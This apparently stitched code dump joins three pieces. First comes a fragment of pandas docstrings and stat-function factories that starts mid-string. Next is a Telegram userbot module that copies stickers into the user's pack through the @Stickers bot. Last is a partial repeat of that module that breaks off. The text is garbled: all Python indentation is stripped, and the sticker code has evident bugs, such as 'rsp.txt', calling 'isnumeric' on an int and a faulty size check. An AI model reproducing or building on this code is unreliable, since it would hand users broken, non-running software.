%(name1)s or %(name2)s (if level specified)\n"""
_bool_doc = """
%(desc)s
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default 0
Indicate which axis or axes should be reduced.
* 0 / 'index' : reduce the index, return a Series whose index is the
original column labels.
* 1 / 'columns' : reduce the columns, return a Series whose index is the
original index.
* None : reduce all axes, return a scalar.
bool_only : bool, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
skipna : bool, default True
Exclude NA/null values. If the entire row/column is NA and skipna is
True, then the result will be %(empty_value)s, as for an empty row/column.
If skipna is False, then NA are treated as True, because these are not
equal to zero.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
If level is specified, then, %(name2)s is returned; otherwise, %(name1)s
is returned.
%(see_also)s
%(examples)s"""
_all_desc = """\
Return whether all elements are True, potentially over an axis.
Returns True unless there at least one element within a series or
along a Dataframe axis that is False or equivalent (e.g. zero or
empty)."""
_all_examples = """\
Examples
--------
**Series**
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
>>> pd.Series([]).all()
True
>>> pd.Series([np.nan]).all()
True
>>> pd.Series([np.nan]).all(skipna=False)
True
**DataFrames**
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Specify ``axis='columns'`` to check if row-wise values all return True.
>>> df.all(axis='columns')
0 True
1 False
dtype: bool
Or ``axis=None`` for whether every value is True.
>>> df.all(axis=None)
False
"""
_all_see_also = """\
See Also
--------
Series.all : Return True if all elements are True.
DataFrame.any : Return True if one (or more) elements are True.
"""
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
See Also
--------
core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
%(examples)s"""
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
_any_see_also = """\
See Also
--------
numpy.any : Numpy version of this method.
Series.any : Return whether any element is True.
Series.all : Return whether all elements are True.
DataFrame.any : Return whether any element is True over requested axis.
DataFrame.all : Return whether all elements are True over requested axis.
"""
_any_desc = """\
Return whether any element is True, potentially over an axis.
Returns False unless there at least one element within a series or
along a Dataframe axis that is True or equivalent (e.g. non-zero or
non-empty)."""
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([False, False]).any()
False
>>> pd.Series([True, False]).any()
True
>>> pd.Series([]).any()
False
>>> pd.Series([np.nan]).any()
False
>>> pd.Series([np.nan]).any(skipna=False)
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
Aggregating over the entire DataFrame with ``axis=None``.
>>> df.any(axis=None)
True
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
_shared_docs[
"stat_func_example"
] = """
Examples
--------
>>> idx = pd.MultiIndex.from_arrays([
... ['warm', 'warm', 'cold', 'cold'],
... ['dog', 'falcon', 'fish', 'spider']],
... names=['blooded', 'animal'])
>>> s = pd.Series([4, 2, 0, 8], name='legs', index=idx)
>>> s
blooded animal
warm dog 4
falcon 2
cold fish 0
spider 8
Name: legs, dtype: int64
>>> s.{stat_func}()
{default_output}
{verb} using level names, as well as indices.
>>> s.{stat_func}(level='blooded')
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64
>>> s.{stat_func}(level=0)
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64"""
_sum_examples = _shared_docs["stat_func_example"].format(
stat_func="sum", verb="Sum", default_output=14, level_output_0=6, level_output_1=8
)
_sum_examples += """
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan"""
_max_examples = _shared_docs["stat_func_example"].format(
stat_func="max", verb="Max", default_output=8, level_output_0=4, level_output_1=8
)
_min_examples = _shared_docs["stat_func_example"].format(
stat_func="min", verb="Min", default_output=0, level_output_0=2, level_output_1=0
)
_stat_func_see_also = """
See Also
--------
Series.sum : Return the sum.
Series.min : Return the minimum.
Series.max : Return the maximum.
Series.idxmin : Return the index of the minimum.
Series.idxmax : Return the index of the maximum.
DataFrame.sum : Return the sum over the requested axis.
DataFrame.min : Return the minimum over the requested axis.
DataFrame.max : Return the maximum over the requested axis.
DataFrame.idxmin : Return the index of the minimum over the requested axis.
DataFrame.idxmax : Return the index of the maximum over the requested axis."""
_prod_examples = """
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan"""
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded:: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(
cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
min_count=_min_count_stub,
see_also=see_also,
examples=examples,
)
@Appender(_num_doc)
def stat_func(
self,
axis=None,
skipna=None,
level=None,
numeric_only=None,
min_count=0,
**kwargs,
):
if name == "sum":
nv.validate_sum(tuple(), kwargs)
elif name == "prod":
nv.validate_prod(tuple(), kwargs)
else:
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(
name, axis=axis, level=level, skipna=skipna, min_count=min_count
)
return self._reduce(
f,
name,
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
min_count=min_count,
)
return set_function_name(stat_func, name, cls)
def _make_stat_function(
cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
min_count="",
see_also=see_also,
examples=examples,
)
@Appender(_num_doc)
def stat_func(
self, axis=None, skipna=None, level=None, numeric_only=None, **kwargs
):
if name == "median":
nv.validate_median(tuple(), kwargs)
else:
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
return self._reduce(
f, name, axis=axis, skipna=skipna, numeric_only=numeric_only
)
return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(desc=desc, name1=name1, name2=name2, axis_descr=axis_descr)
@Appender(_num_ddof_doc)
def stat_func(
self, axis=None, skipna=None, level=None, ddof=1, numeric_only=None, **kwargs
):
nv.validate_stat_ddof_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(
name, axis=axis, level=level, skipna=skipna, ddof=ddof
)
return self._reduce(
f, name, axis=axis, numeric_only=numeric_only, skipna=skipna, ddof=ddof
)
return set_function_name(stat_func, name, cls)
def _make_cum_function(
cls,
name,
name1,
name2,
axis_descr,
desc,
accum_func,
accum_func_name,
mask_a,
mask_b,
examples,
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
accum_func_name=accum_func_name,
examples=examples,
)
@Appender(_cnum_doc)
def cum_func(self, axis=None, skipna=True, *args, **kwargs):
skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
if axis is None:
axis = self._stat_axis_number
else:
axis = self._get_axis_number(axis)
if axis == 1:
return cum_func(self.T, axis=0, skipna=skipna, *args, **kwargs).T
def na_accum_func(blk_values):
# We will be applying this function to block values
if blk_values.dtype.kind in ["m", "M"]:
# GH#30460, GH#29058
# numpy 1.18 started sorting NaTs at the end instead of beginning,
# so we need to work around to maintain backwards-consistency.
orig_dtype = blk_values.dtype
# We need to define mask before masking NaTs
mask = isna(blk_values)
if accum_func == np.minimum.accumulate:
# Note: the accum_func comparison fails as an "is" comparison
y = blk_values.view("i8")
y[mask] = np.iinfo(np.int64).max
changed = True
else:
y = blk_values
changed = False
result = accum_func(y.view("i8"), axis)
if skipna:
np.putmask(result, mask, iNaT)
elif accum_func == np.minimum.accumulate:
# Restore NaTs that we masked previously
nz = (~np.asarray(mask)).nonzero()[0]
if len(nz):
# everything up to the first non-na entry stays NaT
result[: nz[0]] = iNaT
if changed:
# restore NaT elements
y[mask] = iNaT # TODO: could try/finally for this?
if isinstance(blk_values, np.ndarray):
result = result.view(orig_dtype)
else:
# DatetimeArray
result = type(blk_values)._from_sequence(result, dtype=orig_dtype)
elif skipna and not issubclass(
blk_values.dtype.type, (np.integer, np.bool_)
):
vals = blk_values.copy().T
mask = isna(vals)
np.putmask(vals, mask, mask_a)
result = accum_func(vals, axis)
np.putmask(result, mask, mask_b)
else:
result = accum_func(blk_values.T, axis)
# transpose back for ndarray, not for EA
return result.T if hasattr(result, "T") else result
result = self._data.apply(na_accum_func)
d = self._construct_axes_dict()
d["copy"] = False
return self._constructor(result, **d).__finalize__(self)
return set_function_name(cum_func, name, cls)
def _make_logical_function(
cls, name, name1, name2, axis_descr, desc, f, see_also, examples, empty_value
):
@Substitution(
desc=desc,
name1=name1,
name2=name2,
axis_descr=axis_descr,
see_also=see_also,
examples=examples,
empty_value=empty_value,
)
@Appender(_bool_doc)
def logical_func(self, axis=0, bool_only=None, skipna=True, level=None, **kwargs):
nv.validate_logical_func(tuple(), kwargs, fname=name)
if level is not None:
if bool_only is not None:
raise NotImplementedError(
"Option bool_only is not implemented with option level."
)
return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)
return self._reduce(
f,
name,
axis=axis,
skipna=skipna,
numeric_only=bool_only,
filter_type="bool",
)
return set_function_name(logical_func, name, cls)
|
# Copyright (C) 2019 The Raphielscape Company LLC.
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.utils import admin_cmd
import emoji
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Using Witchery to kang this sticker...",
"Plagiarising hehe...",
"Inviting this sticker over to my pack...",
"Kanging this sticker...",
"Hey that's a nice sticker!\nMind if I kang?!..",
"hehe me stel ur stikér\nhehe.",
"Ay look over there (☉。☉)!→\nWhile I kang this...",
"Roses are red violets are blue, kanging this sticker so my pacc looks cool",
"Imprisoning this sticker...",
"Mr.Steal Your Sticker is stealing this sticker... ",
]
@borg.on(admin_cmd(pattern="kang ?(.*)"))
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
try:
user.first_name.encode('utf-8').decode('ascii')
user.username = user.first_name
except UnicodeDecodeError:
user.username = f"cat_{user.id}"
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "😂"
pack = 1
if len(splat) == 3:
if char_is_emoji(splat[1]):
pack = splat[2] # User sent both
emoji = splat[1]
elif char_is_emoji(splat[2]):
pack = splat[1] # User sent both
emoji = splat[2]
else:
await args.edit("check `.info stickers`")
return
elif len(splat) == 2:
if char_is_emoji(splat[1]):
emoji = splat[1]
else:
pack = splat[1]
packname = f"{user.username}_{pack}"
packnick = f"@{user.username}'s_{pack}"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "Whoa! That's probably enough stickers for one pack, give it a break" in x.text:
if pack.isnumeric():
pack += 1
else:
pack = 1
packname = f"{user.username}_{pack}"
packnick = f"@{user.username}'s_{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.txt}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker added is {emoji}",
parse_mode='md')
return
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message('/done')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
else:
await args.edit("`Brewing a new Pack...`")
async with bot.conversation('Stickers') as conv:
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message("/skip")
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message(packname)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Sticker kanged successfully!\
\nPack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker is {emoji}",
parse_mode='md')
async def resize_photo(photo):
""" Resize the given photo to 512x512 """
image = Image.open(photo)
maxsize = (512, 512)
if (image.width and image.height) < 512:
size1 = image.width
size2 = image.height
if image.width > image.height:
scale = 512 / size1
size1new = 512
size2new = size2 * scale
else:
scale = 512 / size2
size1new = size1 * scale
size2new = 512
size1new = math.floor(size1new)
size2new = math.floor(size2new)
sizenew = (size1new, size2new)
image = image.resize(sizenew)
else:
image.thumbnail(maxsize)
return image
def char_is_emoji(character):
return character in emoji.UNICODE_EMOJI
@borg.on(admin_cmd(pattern="stkrinfo$"))
async def get_pack_info(event):
if not event.is_reply:
await event.edit("`I can't fetch info from nothing, can I ?!`")
return
rep_msg = await event.get_reply_message()
if not rep_msg.document:
await event.edit("`Reply to a sticker to get the pack details`")
return
try:
stickerset_attr = rep_msg.document.attributes[1]
await event.edit(
"`Fetching details of the sticker pack, please wait..`")
except BaseException:
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
if not isinstance(stickerset_attr, DocumentAttributeSticker):
await event.edit("`This is not a sticker. Reply to a sticker.`")
return
get_stickerset = await bot(
GetStickerSetRequest(
InputStickerSetID(
id=stickerset_attr.stickerset.id,
access_hash=stickerset_attr.stickerset.access_hash)))
pack_emojis = []
for document_sticker in get_stickerset.packs:
if document_sticker.emoticon not in pack_emojis:
pack_emojis.append(document_sticker.emoticon)
OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
f"**Official:** `{get_stickerset.set.official}`\n" \
f"**Archived:** `{get_stickerset.set.archived}`\n" \
f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
f"**Emojis In Pack:**\n{" ".join(pack_emojis)}"
await event.edit(OUTPUT)
CMD_HELP.update({
"stickers":
".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.utils import admin_cmd
import emoji
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
KANGING_STR = [
"Using Witchery to kang this sticker...",
"Plagiarising hehe...",
"Inviting this sticker over to my pack...",
"Kanging this sticker...",
"Hey that's a nice sticker!\nMind if I kang?!..",
"hehe me stel ur stikér\nhehe.",
"Ay look over there (☉。☉)!→\nWhile I kang this...",
"Roses are red violets are blue, kanging this sticker so my pacc looks cool",
"Imprisoning this sticker...",
"Mr.Steal Your Sticker is stealing this sticker... ",
]
@borg.on(admin_cmd(pattern="kang ?(.*)"))
async def kang(args):
""" For .kang command, kangs stickers or creates new ones. """
user = await bot.get_me()
if not user.username:
try:
user.first_name.encode('utf-8').decode('ascii')
user.username = user.first_name
except UnicodeDecodeError:
user.username = f"cat_{user.id}"
message = await args.get_reply_message()
photo = None
emojibypass = False
is_anim = False
emoji = None
if message and message.media:
if isinstance(message.media, MessageMediaPhoto):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
photo = await bot.download_media(message.photo, photo)
elif "image" in message.media.document.mime_type.split('/'):
await args.edit(f"`{random.choice(KANGING_STR)}`")
photo = io.BytesIO()
await bot.download_file(message.media.document, photo)
if (DocumentAttributeFilename(file_name='sticker.webp') in
message.media.document.attributes):
emoji = message.media.document.attributes[1].alt
emojibypass = True
elif "tgsticker" in message.media.document.mime_type:
await args.edit(f"`{random.choice(KANGING_STR)}`")
await bot.download_file(message.media.document,
'AnimatedSticker.tgs')
attributes = message.media.document.attributes
for attribute in attributes:
if isinstance(attribute, DocumentAttributeSticker):
emoji = attribute.alt
emojibypass = True
is_anim = True
photo = 1
else:
await args.edit("`Unsupported File!`")
return
else:
await args.edit("`I can't kang that...`")
return
if photo:
splat = args.text.split()
if not emojibypass:
emoji = "😂"
pack = 1
if len(splat) == 3:
if char_is_emoji(splat[1]):
pack = splat[2] # User sent both
emoji = splat[1]
elif char_is_emoji(splat[2]):
pack = splat[1] # User sent both
emoji = splat[2]
else:
await args.edit("check `.info stickers`")
return
elif len(splat) == 2:
if char_is_emoji(splat[1]):
emoji = splat[1]
else:
pack = splat[1]
packname = f"{user.username}_{pack}"
packnick = f"@{user.username}'s_{pack}"
cmd = '/newpack'
file = io.BytesIO()
if not is_anim:
image = await resize_photo(photo)
file.name = "sticker.png"
image.save(file, "PNG")
else:
packname += "_anim"
packnick += " (Animated)"
cmd = '/newanimated'
response = urllib.request.urlopen(
urllib.request.Request(f'http://t.me/addstickers/{packname}'))
htmlstr = response.read().decode("utf8").split('\n')
if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
async with bot.conversation('Stickers') as conv:
await conv.send_message('/addsticker')
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packname)
x = await conv.get_response()
while "Whoa! That's probably enough stickers for one pack, give it a break" in x.text:
if pack.isnumeric():
pack += 1
else:
pack = 1
packname = f"{user.username}_{pack}"
packnick = f"@{user.username}'s_{pack}"
await args.edit("`Switching to Pack " + str(pack) +
" due to insufficient space`")
await conv.send_message(packname)
x = await conv.get_response()
if x.text == "Invalid pack selected.":
await conv.send_message(cmd)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.send_message(packnick)
await conv.get_response()
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
if is_anim:
await conv.send_file('AnimatedSticker.tgs')
remove('AnimatedSticker.tgs')
else:
file.seek(0)
await conv.send_file(file, force_document=True)
rsp = await conv.get_response()
if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
await bot.send_read_acknowledge(conv.chat_id)
await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.txt}")
return
await conv.send_message(emoji)
# Ensure user doesn't get spamming notifications
await bot.send_read_acknowledge(conv.chat_id)
await conv.get_response()
await conv.send_message("/publish")
if is_anim:
await conv.get_response()
await conv.send_message(f"<{packnick}>")
# Ensure user doesn't get spamming notifications
await conv.get_response()
await bot.send_read_acknowledge(conv.chat_id)
